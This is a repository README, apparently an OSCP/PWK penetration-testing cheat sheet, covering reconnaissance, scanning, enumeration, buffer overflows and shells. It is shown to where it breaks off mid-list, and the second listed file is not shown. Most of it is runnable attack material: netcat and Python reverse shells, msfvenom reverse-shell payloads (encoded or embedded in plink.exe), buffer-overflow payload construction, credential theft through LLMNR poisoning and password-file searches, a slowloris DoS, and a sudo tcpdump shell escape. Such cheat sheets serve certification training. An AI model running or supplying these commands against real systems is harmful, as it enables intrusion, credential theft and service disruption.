├── README.md
└── oscp_human_guide.md
/README.md:
--------------------------------------------------------------------------------
1 | # Old OSCP
2 | OSCP cheatsheet by https://github.com/ibr2
3 |
4 |
5 | # PWK-CheatSheet
6 |
7 |
8 |
9 | ██▓███ █ ███ ▄█▀ ▄████▄ ██░ ██▓█████▄▄▄ ▄▄▄█████▓ ██████ ██░ ██▓█████▓████▄▄▄█████▓
10 | ▓██░ ██▓█░ █ ░███▄█▒ ▒██▀ ▀█ ▓██░ ██▓█ ▒████▄ ▓ ██▒ ▓▒ ▒██ ▒▓██░ ██▓█ ▀▓█ ▓ ██▒ ▓▒
11 | ▓██░ ██▓▒█░ █ ░▓███▄░ ▒▓█ ▄▒██▀▀██▒███ ▒██ ▀█▄▒ ▓██░ ▒░ ░ ▓██▄ ▒██▀▀██▒███ ▒███ ▒ ▓██░ ▒░
12 | ▒██▄█▓▒ ░█░ █ ░▓██ █▄ ▒▓▓▄ ▄██░▓█ ░██▒▓█ ░██▄▄▄▄█░ ▓██▓ ░ ▒ ██░▓█ ░██▒▓█ ▄▒▓█ ░ ▓██▓ ░
13 | ▒██▒ ░ ░░██▒██▒██▒ █▄ ▒ ▓███▀ ░▓█▒░██░▒████▓█ ▓██▒▒██▒ ░ ▒██████▒░▓█▒░██░▒████░▒████▒▒██▒ ░
14 | ▒▓▒░ ░ ░ ▓░▒ ▒▒ ▒▒ ▓▒ ░ ░▒ ▒ ░▒ ░░▒░░░ ▒░ ▒▒ ▓▒█░▒ ░░ ▒ ▒▓▒ ▒ ░▒ ░░▒░░░ ▒░ ░░ ▒░ ░▒ ░░
15 | ░▒ ░ ▒ ░ ░░ ░▒ ▒░ ░ ▒ ▒ ░▒░ ░░ ░ ░▒ ▒▒ ░ ░ ░ ░▒ ░ ░▒ ░▒░ ░░ ░ ░░ ░ ░ ░
16 | ░░ ░ ░░ ░░ ░ ░ ░ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░
17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
18 | ░
19 |
20 | #### Penetration Testing with Kali Linux (PWK) course and Offensive Security Certified Professional (OSCP) Cheat Sheet
21 |
22 | ## Table of Contents
23 | - [Linux 101](#linux-101)
24 | - [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)
25 | * [Passive Information Gathering](#passive-information-gathering)
26 | * [Active Information Gathering](#active-information-gathering)
27 | * [Port Scanning](#port-scanning)
28 | * [Enumeration](#enumeration)
29 | * [HTTP Enumeration](#http-enumeration)
30 | - [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)
31 | - [Shells](#shells)
32 | - [File Transfers](#file-transfers)
33 | - [Privilege Escalation](#privilege-escalation)
34 | * [Linux Privilege Escalation](#linux-privilege-escalation)
35 | * [Windows Privilege Escalation](#windows-privilege-escalation)
36 | - [Client, Web and Password Attacks](#client-web-and-password-attacks)
37 | * [Client Attacks](#client-attacks)
38 | * [Web Attacks](#web-attacks)
39 | * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)
40 | * [Database Vulnerabilities](#database-vulnerabilities)
41 | * [Password Attacks](#password-attacks)
42 | * [Password Hash Attacks](#password-hash-attacks)
43 | - [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)
44 | - [The Metasploit Framework](#the-metasploit-framework)
45 | - [Bypassing Antivirus Software](#bypassing-antivirus-software)
46 |
47 | Linux 101
48 | ===============================================================================================================================
49 | # Set the Target IP Address to the $ip system variable
50 | ```shell
51 | $ export ip=192.168.1.100
52 | ```
53 | # Find the location of a file
54 | ```shell
55 | $ locate sbd.exe
56 | ```
57 | # Search through directories in the $PATH environment variable
58 | ```shell
59 | $ which sbd
60 | ```
61 | # Find a search for a file that contains a specific string in it’s name
62 | ```shell
63 | $ find / -name sbd\*
64 | ```
65 | # Show active internet connections
66 | ```shell
67 | $ netstat -lntp
68 | ```
69 | # Change Password
70 | ```shell
71 | $ passwd
72 | ```
73 | # Verify a service is running and listening
74 | ```shell
75 | $ netstat -antp |grep apache
76 | ```
77 | # Start a service
78 | ```shell
79 | $ systemctl start ssh
80 | $ systemctl start apache2
81 | ```
82 | # Unzip a gz file
83 | ```shell
84 | $ gunzip access.log.gz
85 | ```
86 | # Unzip a tar.gz file
87 | ```shell
88 | $ tar -xzvf file.tar.gz
89 | ```
90 | - Search command history
91 | ```shell
92 | history | grep phrase\_to\_search\_for
93 | ```
94 |
95 | - Have a service start at boot
96 | ```shell
97 | systemctl enable ssh
98 | ```
99 | - Stop a service
100 | `systemctl stop ssh`
101 |
102 | - Download a webpage
103 | `wget [www.cisco.com](http://www.cisco.com)`
104 |
105 | - Open a webpage
106 | `curl [www.cisco.com](http://www.cisco.com)
107 |
108 | - String manipulation
109 |
110 | - Count number of lines in file
111 | `wc index.html`
112 |
113 | - Get the start or end of a file
114 | `head index.html `
115 | `tail index.html`
116 |
117 | - Extract all the lines that contain a string
118 | `grep "href=" index.html`
119 |
120 | - Cut a string by a delimiter, filter results then sort
121 | `grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u`
122 |
123 | - Using Grep and regular expressions and output to a file
124 | `cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt`
125 |
126 | - Use a bash loop to find the IP address behind each host
127 | `for url in $(cat list.txt); do host $url; done`
128 |
129 | - Collect all the IP Addresses from a log file and sort by
130 | frequency
131 | `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
132 |
133 | - Netcat - Read and write TCP and UDP Packets
134 |
135 | - Connect to a POP3 mail server
136 | `nc -nv $ip 110`
137 |
138 | - Listen on TCP/UDP port
139 | `nc -nlvp 4444`
140 |
141 | - Connect to a netcat port
142 | `nc -nv $ip 4444`
143 |
144 | - Send a file using netcat
145 | `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`
146 |
147 | - Receive a file using netcat
148 | `nc -nlvp 4444 > incoming.exe`
149 |
150 | - Create a reverse shell with Ncat using cmd.exe on Windows
151 | `nc -nlvp 4444 -e cmd.exe`
152 |
153 | - Create a reverse shell with Ncat using bash on Linux
154 | `nc -nv $ip 4444 -e /bin/bash`
155 |
156 | - Ncat - Netcat for Nmap project which provides more security avoid
157 | IDS
158 |
159 | - Reverse shell from windows using cmd.exe using ssl
160 | `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`
161 |
162 | - Listen on port 4444 using ssl
163 | `ncat -v $ip 4444 --ssl`
164 |
165 | - Wireshark
166 | - Show only SMTP (port 25) and ICMP traffic:
167 | `tcp.port eq 25 or icmp`
168 |
169 | - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
170 | `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`
171 |
172 | - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:
173 | `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`
174 |
175 | - Some commands are equal
176 | `ip.addr == 10.43.54.65`
177 | Equals
178 | `ip.src == 10.43.54.65 or ip.dst == 10.43.54.65 `
179 |
180 | ` ip.addr != 10.43.54.65`
181 | Equals
182 | `ip.src != 10.43.54.65 or ip.dst != 10.43.54.65`
183 |
184 | - Tcpdump
185 |
186 | - Display a pcap file
187 | `tcpdump -r password\_cracking\_filtered.pcap`
188 |
189 | - Display ips and filter and sort
190 | `tcpdump -n -r password\_cracking\_filtered.pcap | awk -F" " '{print $3}' | sort -u | head`
191 |
192 | - Grab a packet capture on port 80
193 | `tcpdump tcp port 80 -w output.pcap -i eth0`
194 |
195 | - Check for ACK or PSH flag set in a TCP packet
196 | `tcpdump -A -n 'tcp\[13\] = 24' -r password\_cracking\_filtered.pcap`
197 |
198 | - IPTables deny traffic to ports except for Local Loopback
199 | ```shell
200 | iptables -A INPUT -p tcp --destination-port 13327 \\! -d $ip -j DROP
201 | iptables -A INPUT -p tcp --destination-port 4444 \\! -d $ip -j DROP
202 | ```
203 | Information Gathering & Vulnerability Scanning
204 | ===============================================================================================================================
205 |
206 | - Passive Information Gathering
207 | ---------------------------------------------------------------------------------------------------------------------------
208 |
209 | - Google Hacking
210 |
211 | - Google search to find website sub domains
212 | `site:microsoft.com`
213 | `site:[www.microsoft.com](http://www.microsoft.com)`
214 |
215 | - Google filetype, and intitle
216 | `intitle:”netbotz appliance” “OK” -filetype:pdf`
217 |
218 | - Google inurl
219 | `inurl:”level/15/sexec/-/show”`
220 |
221 | - Google Hacking Database:
222 | https://www.exploit-db.com/google-hacking-database/
223 |
224 | - SSL Certificate Testing
225 | [*https://www.ssllabs.com/ssltest/analyze.html*](https://www.ssllabs.com/ssltest/analyze.html)
226 |
227 | - Email Harvesting
228 |
229 | - Simply Email
230 | `git clone https://github.com/killswitch-GUI/SimplyEmail.git `
231 | `./SimplyEmail.py -all -e TARGET-DOMAIN`
232 |
233 | - Netcraft
234 |
235 | - Determine the operating system and tools used to build a site
236 | https://searchdns.netcraft.com/
237 |
238 | - Whois Enumeration
239 | `whois domain-name-here.com `
240 | `whois $ip`
241 |
242 | - Banner Grabbing
243 |
244 | - `nc -v $ip 25`
245 |
246 | - `telnet $ip 25`
247 |
248 | - `nc TARGET-IP 80`
249 |
250 | - Recon-ng - full-featured web reconnaissance framework written in Python
251 |
252 | - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git `
253 | `cd /opt/recon-ng `
254 | `./recon-ng `
255 | `show modules `
256 | `help`
257 |
258 | - Active Information Gathering
259 | --------------------------------------------------------------------------------------------------------------------------
260 |
261 |
262 |
263 | - DNS Enumeration
264 |
265 | - Host Lookup
266 | `host -t ns megacorpone.com`
267 |
268 | - Reverse Lookup Brute Force - find domains in the same range
269 | `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`
270 |
271 | - Perform DNS IP Lookup
272 | `dig a domain-name-here.com @nameserver`
273 |
274 | - Perform MX Record Lookup
275 | `dig mx domain-name-here.com @nameserver`
276 |
277 | - Perform Zone Transfer with DIG
278 | `dig axfr domain-name-here.com @nameserver`
279 |
280 | - DNS Zone Transfers
281 | Windows DNS zone transfer
282 | `nslookup -> set type=any -> ls -d blah.com `
283 | Linux DNS zone transfer
284 | `dig axfr blah.com @ns1.blah.com`
285 |
286 | - Dnsrecon DNS Brute Force
287 | `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml`
288 |
289 | - Dnsrecon DNS List of megacorp
290 | `dnsrecon -d megacorpone.com -t axfr`
291 |
292 | - DNSEnum
293 | `dnsenum zonetransfer.me`
294 |
295 | - Port Scanning
296 | -----------------------------------------------------------------------------------------------------------
297 | *Subnet Reference Table*
298 |
299 | / | Addresses | Hosts | Netmask | Amount of a Class C
300 | --- | --- | --- | --- | ---
301 | /30 | 4 | 2 | 255.255.255.252| 1/64
302 | /29 | 8 | 6 | 255.255.255.248 | 1/32
303 | /28 | 16 | 14 | 255.255.255.240 | 1/16
304 | /27 | 32 | 30 | 255.255.255.224 | 1/8
305 | /26 | 64 | 62 | 255.255.255.192 | 1/4
306 | /25 | 128 | 126 | 255.255.255.128 | 1/2
307 | /24 | 256 | 254 | 255.255.255.0 | 1
308 | /23 | 512 | 510 | 255.255.254.0 | 2
309 | /22 | 1024 | 1022 | 255.255.252.0 | 4
310 | /21 | 2048 | 2046 | 255.255.248.0 | 8
311 | /20 | 4096 | 4094 | 255.255.240.0 | 16
312 | /19 | 8192 | 8190 | 255.255.224.0 | 32
313 | /18 | 16384 | 16382 | 255.255.192.0 | 64
314 | /17 | 32768 | 32766 | 255.255.128.0 | 128
315 | /16 | 65536 | 65534 | 255.255.0.0 | 256
316 |
317 | - Set the ip address as a varble
318 | `export ip=192.168.1.100 `
319 | `nmap -A -T4 -p- $ip`
320 |
321 | - Netcat port Scanning
322 | `nc -nvv -w 1 -z $ip 3388-3390`
323 |
324 | - Discover who else is on the network
325 | `netdiscover`
326 |
327 | - Discover IP Mac and Mac vendors from ARP
328 | `netdiscover -r $ip/24`
329 |
330 | - Nmap stealth scan using SYN
331 | `nmap -sS $ip`
332 |
333 | - Nmap stealth scan using FIN
334 | `nmap -sF $ip`
335 |
336 | - Nmap Banner Grabbing
337 | `nmap -sV -sT $ip`
338 |
339 | - Nmap OS Fingerprinting
340 | `nmap -O $ip`
341 |
342 | - Nmap Regular Scan:
343 | `nmap $ip/24`
344 |
345 | - Enumeration Scan
346 | `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`
347 |
348 | - Enumeration Scan All Ports TCP / UDP and output to a txt file
349 | `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`
350 |
351 | - Nmap output to a file:
352 | `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`
353 |
354 | - Quick Scan:
355 | `nmap -T4 -F $ip/24`
356 |
357 | - Quick Scan Plus:
358 | `nmap -sV -T4 -O -F --version-light $ip/24`
359 |
360 | - Quick traceroute
361 | `nmap -sn --traceroute $ip`
362 |
363 | - All TCP and UDP Ports
364 | `nmap -v -sU -sS -p- -A -T4 $ip`
365 |
366 | - Intense Scan:
367 | `nmap -T4 -A -v $ip`
368 |
369 | - Intense Scan Plus UDP
370 | `nmap -sS -sU -T4 -A -v $ip/24`
371 |
372 | - Intense Scan ALL TCP Ports
373 | `nmap -p 1-65535 -T4 -A -v $ip/24`
374 |
375 | - Intense Scan - No Ping
376 | `nmap -T4 -A -v -Pn $ip/24`
377 |
378 | - Ping scan
379 | `nmap -sn $ip/24`
380 |
381 | - Slow Comprehensive Scan
382 | `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`
383 |
384 | - Scan with Active connect in order to weed out any spoofed ports designed to troll you
385 | `nmap -p1-65535 -A -T5 -sT $ip`
386 |
387 | - Enumeration
388 | -----------
389 |
390 | - NMap Enumeration Script List:
391 |
392 | - NMap Discovery
393 | [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)
394 |
395 | - Nmap port version detection MAXIMUM power
396 | `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>`
397 |
398 | -
399 |
400 | - SMB Enumeration
401 |
402 | - SMB OS Discovery
403 | `nmap $ip --script smb-os-discovery.nse`
404 |
405 | - Nmap port scan
406 | `nmap -v -p 139,445 -oG smb.txt $ip-254`
407 |
408 | - Netbios Information Scanning
409 | `nbtscan -r $ip/24`
410 |
411 | - Nmap find exposed Netbios servers
412 | `nmap -sU --script nbstat.nse -p 137 $ip`
413 |
414 | - SMB Enumeration Tools
415 | `nmblookup -A $ip `
416 | `smbclient //MOUNT/share -I $ip -N `
417 | `rpcclient -U "" $ip `
418 | `enum4linux $ip `
419 | `enum4linux -a $ip`
420 |
421 | - SMB Finger Printing
422 | `smbclient -L //$ip`
423 |
424 | - Nmap Scan for Open SMB Shares
425 | `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 $ip/24`
426 |
427 | - Nmap scans for vulnerable SMB Servers
428 | `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`
429 |
430 | - Nmap List all SMB scripts installed
431 | `ls -l /usr/share/nmap/scripts/smb\*`
432 |
433 | - Enumerate SMB Users
434 |
435 | - `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`
436 |
437 | - `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip`
438 |
439 | - RID Cycling - Null Sessions
440 | [*https://www.trustedsec.com/march-2013/new-tool-release-rpc\_enum-rid-cycling-attack/*](https://www.trustedsec.com/march-2013/new-tool-release-rpc_enum-rid-cycling-attack/)
441 |
442 | - `ridenum.py $ip 500 50000 dict.txt`
443 |
444 | - `use auxiliary/scanner/smb/smb\_lookupsid`
445 |
446 | - Manual Null Session Testing
447 |
448 | - Windows: `net use \\\\$ip\\IPC$ "" /u:""`
449 |
450 | - Linux: `smbclient -L //$ip`
451 |
452 | - LLMNR / NBT-NS Spoofing - Steal credentials off the network.
453 |
454 | - Spoof / poison LLMNR / NetBIOS requests:
455 | auxiliary/spoof/llmnr/llmnr\_response
456 | auxiliary/spoof/nbns/nbns\_response
457 |
458 | - Capture the hashes:
459 | auxiliary/server/capture/smb
460 | auxiliary/server/capture/http\_ntlm
461 |
462 | - Using Responder to Steal Creds
463 | `git clone https://github.com/SpiderLabs/Responder.git `
464 | `python Responder.py -i local-ip -I eth0`
465 |
466 | - SMTP Enumeration - Mail Severs
467 |
468 | - Verify SMTP port using Netcat
469 | `nc -nv $ip 25`
470 |
471 | - SNMP Enumeration -Simple Network Management Protocol
472 |
473 | - Fix SNMP output values so they are human readable
474 | `apt-get install snmp-mibs-downloader download-mibs `
475 | `echo "" > /etc/snmp/snmp.conf`
476 |
477 | - SNMP Enumeration Commands
478 |
479 | - `snmpcheck -t $ip -c public`
480 |
481 | - `snmpwalk -c public -v1 $ip 1|`
482 |
483 | - `grep hrSWRunName|cut -d\* \* -f`
484 |
485 | - `snmpenum -t $ip`
486 |
487 | - `onesixtyone -c names -i hosts`
488 |
489 | - SNMPv3 Enumeration
490 | `nmap -sV -p 161 --script=snmp-info $ip/24`
491 |
492 | - Automate the username enumeration process for SNMPv3:
493 | `apt-get install snmp snmp-mibs-downloader `
494 | `wget `
495 |
496 | - SNMP Default Credentials
497 | /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt
498 |
499 | - Linux OS Enumeration
500 |
501 | - List all SUID files
502 | `find / -perm -4000 2>/dev/null`
503 |
504 | - Determine the current version of Linux
505 | `cat /etc/issue`
506 |
507 | - Determine more information about the environment
508 | `uname -a`
509 |
510 | - List processes running
511 | `ps -xaf`
512 |
513 | - List the allowed (and forbidden) commands for the invoking use
514 | `sudo -l`
515 |
516 | - List iptables rules
517 | `iptables --table nat --list
518 | iptables -vL -t filter
519 | iptables -vL -t nat
520 | iptables -vL -t mangle
521 | iptables -vL -t raw
522 | iptables -vL -t security`
523 |
524 | - Windows OS Enumeration
525 |
526 |
527 | - net config Workstation
528 |
529 | - systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
530 |
531 | - hostname
532 |
533 | - net users
534 |
535 | - ipconfig /all
536 |
537 | - route print
538 |
539 | - arp -A
540 |
541 | - netstat -ano
542 |
543 | - netsh firewall show state
544 |
545 | - netsh firewall show config
546 |
547 | - schtasks /query /fo LIST /v
548 |
549 | - tasklist /SVC
550 |
551 | - net start
552 |
553 | - DRIVERQUERY
554 |
555 | - reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
556 |
557 | - reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
558 |
559 | - dir /s *pass* == *cred* == *vnc* == *.config*
560 |
561 | - findstr /si password *.xml *.ini *.txt
562 |
563 | - reg query HKLM /f password /t REG_SZ /s
564 |
565 | - reg query HKCU /f password /t REG_SZ /s
566 |
567 | - Vulnerability Scanning with Nmap
568 |
569 | - Nmap Exploit Scripts
570 | [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
571 |
572 | - Nmap search through vulnerability scripts
573 | `cd /usr/share/nmap/scripts/
574 | ls -l \*vuln\*`
575 |
576 | - Nmap search through Nmap Scripts for a specific keyword
577 | `ls /usr/share/nmap/scripts/\* | grep ftp`
578 |
579 | - Scan for vulnerable exploits with nmap
580 | `nmap --script exploit -Pn $ip`
581 |
582 | - NMap Auth Scripts
583 | [*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
584 |
585 | - Nmap Vuln Scanning
586 | [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
587 |
588 | - NMap DOS Scanning
589 | `nmap --script dos -Pn $ip
590 | NMap Execute DOS Attack
591 | nmap --max-parallelism 750 -Pn --script http-slowloris --script-args
592 | http-slowloris.runforever=true`
593 |
594 | - Scan for coldfusion web vulnerabilities
595 | `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`
596 |
597 | - Anonymous FTP dump with Nmap
598 | `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
599 |
600 | - SMB Security mode scan with Nmap
601 | `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
602 |
603 | - File Enumeration
604 |
605 | - Find UID 0 files root execution
606 |
607 | - `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null`
608 |
609 | - Get handy linux file system enumeration script (/var/tmp)
610 | `wget `
611 | `chmod +x ./linux-local-enum.sh `
612 | `./linux-local-enum.sh`
613 |
614 | - Find executable files updated in August
615 | `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
616 |
617 | - Find a specific file on linux
618 | `find /. -name suid\*`
619 |
620 | - Find all the strings in a file
621 | `strings <filename>`
622 |
623 | - Determine the type of a file
624 | `file <filename>`
625 |
626 | - HTTP Enumeration
627 | ----------------
628 |
629 | - Search for folders with gobuster:
630 | `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
631 |
632 | - OWasp DirBuster - Http folder enumeration - can take a dictionary file
633 |
634 | - Dirb - Directory brute force finding using a dictionary file
635 | `dirb http://$ip/ wordlist.dict `
636 | `dirb `
637 |
638 | Dirb against a proxy
639 |
640 | - `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129`
641 |
642 | - Nikto
643 | `nikto -h $ip`
644 |
645 | - HTTP Enumeration with NMAP
646 | `nmap --script=http-enum -p80 -n $ip/24`
647 |
648 | - Nmap Check the server methods
649 | `nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
650 |
651 | - Get Options available from web server
652 | `curl -vX OPTIONS vm/test`
653 |
654 | - Uniscan directory finder:
655 | `uniscan -qweds -u `
656 |
657 | - Wfuzz - The web brute forcer
658 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `
659 | `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `
660 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`
661 |
662 |
663 |
664 | - Open a service using a port knock (Secured with Knockd)
665 | for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201
666 | --max-retries 0 -p $x server\_ip\_address; done
667 |
668 | - WordPress Scan - Wordpress security scanner
669 |
670 | - wpscan --url $ip/blog --proxy $ip:3129
671 |
672 | - RSH Enumeration - Unencrypted file transfer system
673 |
674 | - auxiliary/scanner/rservices/rsh\_login
675 |
676 | - Finger Enumeration
677 |
678 | - finger @$ip
679 |
680 | - finger batman@$ip
681 |
682 | - TLS & SSL Testing
683 |
684 | - ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha >
685 | OUTPUT-FILE.html
686 |
687 | - Proxy Enumeration (useful for open proxies)
688 |
689 | - nikto -useproxy http://$ip:3128 -h $ip
690 |
691 | - Steganography
692 |
693 | > apt-get install steghide
694 | >
695 | > steghide extract -sf picture.jpg
696 | >
697 | > steghide info picture.jpg
698 | >
699 | > apt-get install stegosuite
700 |
701 | - The OpenVAS Vulnerability Scanner
702 |
703 | - apt-get update
704 | apt-get install openvas
705 | openvas-setup
706 |
707 | - netstat -tulpn
708 |
709 | - Login at:
710 | https://$ip:9392
711 |
712 | Buffer Overflows and Exploits
713 | ===================================================================================================================================
714 |
715 | - DEP and ASLR - Data Execution Prevention (DEP) and Address Space
716 | Layout Randomization (ASLR)
717 |
718 | - MSFvenom
719 | [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)
720 |
721 | - Windows Buffer Overflows
722 |
723 | - Controlling EIP
724 |
725 | - locate pattern\_create
726 |
727 | - pattern\_create.rb -l 2700
728 |
729 | - locate pattern\_offset
730 |
731 | - pattern\_offset.rb -q 39694438
732 |
733 | - Verify exact location of EIP - \[\*\] Exact match at offset 2606
734 |
735 | - buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
736 |
737 | - Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
738 |
739 | - Use Mona to determine a module that is unprotected
740 |
741 | - Bypass DEP if present by finding a Memory Location with Read and
742 | Execute access for JMP ESP
743 |
744 | - Otherwise without DEP, we can stick our
745 |
746 | - Use NASM to determine the HEX code for a JMP ESP instruction
747 |
748 | - /usr/share/metasploit-framework/tools/exploit/nasm\_shell.rb
749 |
750 | - JMP ESP
751 | 00000000 FFE4 jmp esp
752 |
753 | - Run Mona in immunity log window to find (FFE4) XEF command
754 |
755 | - !mona find -s "\\xff\\xe4" -m slmfc.dll
756 | found at 0x5f4a358f - Flip around for little endian format
757 |
758 | - buffer = "A" \* 2606 + "\\x8f\\x35\\x4a\\x5f" + "C" \* 390
759 |
760 | - MSFVenom to create payload
761 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=443 -f c
762 | –e x86/shikata\_ga\_nai -b "\\x00\\x0a\\x0d"
763 |
764 | - Final Payload with NOP slide
765 | buffer="A"\*2606 + "\\x8f\\x35\\x4a\\x5f" + "\\x90" \* 8 +
766 | shellcode
767 |
768 | - Create a PE Reverse Shell
769 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
770 | -f
771 | exe -o shell\_reverse.exe
772 |
773 | - Create a PE Reverse Shell and Encode 9 times with
774 | Shikata\_ga\_nai
775 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
776 | -f
777 | exe -e x86/shikata\_ga\_nai -i 9 -o
778 | shell\_reverse\_msf\_encoded.exe
779 |
780 | - Create a PE reverse shell and embed it into an existing
781 | executable
782 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f
783 | exe -e x86/shikata\_ga\_nai -i 9 -x
784 | /usr/share/windows-binaries/plink.exe -o
785 | shell\_reverse\_msf\_encoded\_embedded.exe
786 |
787 | - Create a PE Reverse HTTPS shell
788 | msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip
789 | LPORT=443 -f exe -o met\_https\_reverse.exe
790 |
791 | - Linux Buffer Overflows
792 |
793 | - Run Evans Debugger against an app
794 | edb --run /usr/games/crossfire/bin/crossfire
795 |
796 | - ESP register points toward the end of our CBuffer
797 | add eax,12
798 | jmp eax
799 | 83C00C add eax,byte +0xc
800 | FFE0 jmp eax
801 |
802 | - Check for “Bad Characters” Process of elimination - Run multiple
803 | times 0x00 - 0xFF
804 |
805 | - Find JMP ESP address
806 | "\\x97\\x45\\x13\\x08" \# Found at Address 08134597
807 |
808 | - crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" +
809 | "\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"
810 |
811 | - msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b
812 | "\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai
813 |
814 | - Connect to the shell with netcat:
815 | nc -v $ip 4444
816 |
817 | Shells
818 | ===============================================================================================================================
819 |
820 | - Netcat Shell Listener
821 | nc -nlvp 443
822 |
823 | - Spawning a TTY Shell - Break out of Jail or limited shell
824 | You should almost always upgrade your shell after taking control of an apache or www user.
825 | (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
826 | (hint: sudo -l to see what you can run)
827 |
828 | - python -c 'import pty; pty.spawn("/bin/sh")'
829 |
830 | - python -c 'import
831 | socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);
832 | s.connect(("$ip",1234));os.dup2(s.fileno(),0);
833 | os.dup2(s.fileno(),1);
834 | os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
835 |
836 | - echo os.system('/bin/bash')
837 |
838 | - /bin/sh -i
839 |
840 | - perl —e 'exec "/bin/sh";'
841 |
842 | - perl: exec "/bin/sh";
843 |
844 | - ruby: exec "/bin/sh"
845 |
846 | - lua: os.execute('/bin/sh')
847 |
848 | - (From within IRB)
849 | exec "/bin/sh"
850 |
851 | - (From within vi)
852 | :!bash
853 |
854 | - From within vim
855 | Breaking out of vim is done by ':!bash':
856 |
857 | - (From within vi)
858 | :set shell=/bin/bash:shell
859 |
860 | - (From within nmap)
861 | !sh
862 |
863 | - (From within tcpdump)
864 | echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ >
865 | /tmp/.test
866 | chmod +x /tmp/.test
867 | sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst
868 | –Z root
869 |
870 | - from busybox
871 | /bin/busybox telnetd -|/bin/sh -p9999
872 |
873 | - Pen test monkey PHP reverse shell
874 | [*http://pentestmonkey.net/tools/web-shells/php-reverse-shel*](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
875 |
876 | - php-findsock-shell - turns PHP port 80 into an interactive shell
877 | [*http://pentestmonkey.net/tools/web-shells/php-findsock-shell*](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)
878 |
879 | - Perl Reverse Shell
880 | [*http://pentestmonkey.net/tools/web-shells/perl-reverse-shell*](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
881 |
882 | - PHP powered web browser Shell b374k with file upload etc.
883 | [*https://github.com/b374k/b374k*](https://github.com/b374k/b374k)
884 |
885 | - Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
